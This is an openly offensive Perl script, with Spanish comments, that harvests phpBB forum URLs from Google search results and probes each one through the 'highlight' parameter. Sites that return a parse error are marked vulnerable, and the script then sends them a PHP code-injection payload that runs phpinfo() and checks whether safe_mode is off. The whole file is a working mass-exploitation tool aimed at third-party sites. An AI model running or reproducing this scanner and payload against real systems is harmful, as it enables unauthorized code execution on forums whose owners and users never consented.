#!/usr/bin/perl #phpbb highlight vuln scanner by simkin at badchecksum v 0.2 #Necesita libwww-perl (debian) ##opciones $verbose = 1; $check_safe_mode = 1; $ouputopt = 0; $lang = "lang_en"; ##opciones use LWP; require HTTP::Headers; require LWP::UserAgent; print "\n\n"; if(($#ARGV + 1) < 1) { die "usage: phpbbscan \n"; } $keyword = "viewtopic+"; $keyword .= shift; @saved_urls; @query = ('http://www.google.es/search?q=','&lr=','&start=','&sa=N'); $usr_agent = LWP::UserAgent->new('agent'=>'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041219 Firefox/1.0 (Debian package 1.0+dfsg.1-1)'); $usr_agent->timeout(10); $usr_agent->max_size(60000); $hdr = HTTP::Headers->new( 'Host' => 'www.google.com', 'Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', 'Accept-Language' => 'es,en-us;q=0.7,en;q=0.3', #'Accept-Encoding' => 'gzip,deflate', 'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive' => '300', 'Connection' => 'keep-alive', 'Referer' => 'http://www.google.com/search?q=sfa&hl=es&lr=&start=20&sa=N'); #'Cookie' => 'PREF=ID=5f5847dd68df26eb:LD=es:TM=1101158153:LM=1101158154:S=6ReB7d9_FtbKU-Mq'); print (":] phpbbscan: Recogiendo urls de google... \n"); for($i = 0;;$i += 10) { $urlget = "$query[0]$keyword$query[1]$lang$query[2]$i$query[3]"; $request = HTTP::Request->new(GET =>$urlget,$hdr); $response = $usr_agent->request($request); $plain_html = $response->content; if(!$i) { if(!($plain_html =~ m/()/)) { print ":( phpbbscan: no hay resultados.\n\n"; exit; } } while($plain_html =~ m//g) { $url = $1; if($1 =~ m/viewtopic.php\?t=/) { push(@saved_urls,$url); } } if($plain_html =~ m/

/) { print "O_o phpbbscan: Recogidas ".@saved_urls." urls de google.\n"; last; } } print ":] phpbbscan: Eliminando las urls repetidas...\n"; foreach $lmnt (@saved_urls) { $nomatches = 1; foreach $_lmnt (@clean_urls) { $lmnt =~ m/(.*)t=[0-9]/; $lmnt_notopicnum = $1; $_lmnt =~ m/(.*)t=[0-9]/; $_lmnt_notopicnum = $1; if($lmnt_notopicnum eq $_lmnt_notopicnum) { $nomatches = 0; } } if($nomatches) { push(@clean_urls,$lmnt); } } print "o_O phpbbscan: ".@clean_urls." urls validas.\n"; print ":] phpbbscan: Buscando foros vulnerables...\n\n"; $exp = "&highlight=%2527"; @final_urls; #Elimina urls iguales foreach $forumurl (@clean_urls) { ($host) = $forumurl =~ m!htt[ps]:\/\/(.*?)\/!; ($url) = $forumulr =~ m/(.*\.php)/; ($urlget) = $forumurl =~ m/(.*\?t=[0-9]*)/; $urlget .= $exp; $hdr = HTTP::Headers->new( 'Host' => $host, 'Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', 'Accept-Language' => 'es,en-us;q=0.7,en;q=0.3', 'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive' => '300', 'Connection' => 'keep-alive', 'Referer' => $url); $request = HTTP::Request->new(GET =>$urlget,$hdr); $response = $usr_agent->request($request); $plain_html = $response->content; if($plain_html =~ m/[pP]arse error/) { if($verbose) { print "$urlget VULN\n"; } push(@final_urls,$forumurl); } else { if($verbose) { print "$urlget\n"; } } } print "\n:) Busqueda finalizada. Hay por lo menos ".@final_urls." sitio(s) vulnerables.\n"; #safe_modeOffOff #Comprueba si hay safe mode if($check_safe_mode) { print "\n :E Comprobando si safe_mode esta activado:\n\n"; $phpinfo = "&highlight=%2527%252Eprint(phpinfo())%252e%2527"; foreach $vulnurl(@final_urls) { print "$vulnurl:\n"; ($host) = $forumurl =~ m!htt[ps]:\/\/(.*?)\/!; ($url) = $forumulr =~ m/(.*\.php)/; ($urlget) = $vulnurl =~ m/(.*\?t=[0-9]*)/; $urlget .= $phpinfo; $hdr = HTTP::Headers->new( 'Host' => $host, 'Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', 'Accept-Language' => 'es,en-us;q=0.7,en;q=0.3', 'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive' => '300', 'Connection' => 'keep-alive', 'Referer' => $url); $request = HTTP::Request->new(GET=>$urlget,$hdr); $response = $usr_agent->request($request); $plain_html = $response->content; open(GAY,">> ./outputa.txt"); print GAY $plain_html; close(GAY); if($plain_html =~ m/safe_mode<\/td>(.*?)<\/td>[Ofn]*?<\/td><\/tr>/m) { if($1 eq "Off") { print "Safe_mode desactivado :)\n\n"; } else { print "Safe_mode activado :(\n\n"; } } else { print "Error. perhaps phpinfo not working??\n\n"; } } } if($outputopt) { $output = join("\n",@final_urls); open(GAY,">> ./outputa.txt") || die "No pudo abrirse output.txt: $!"; print GAY $output; close(GAY); }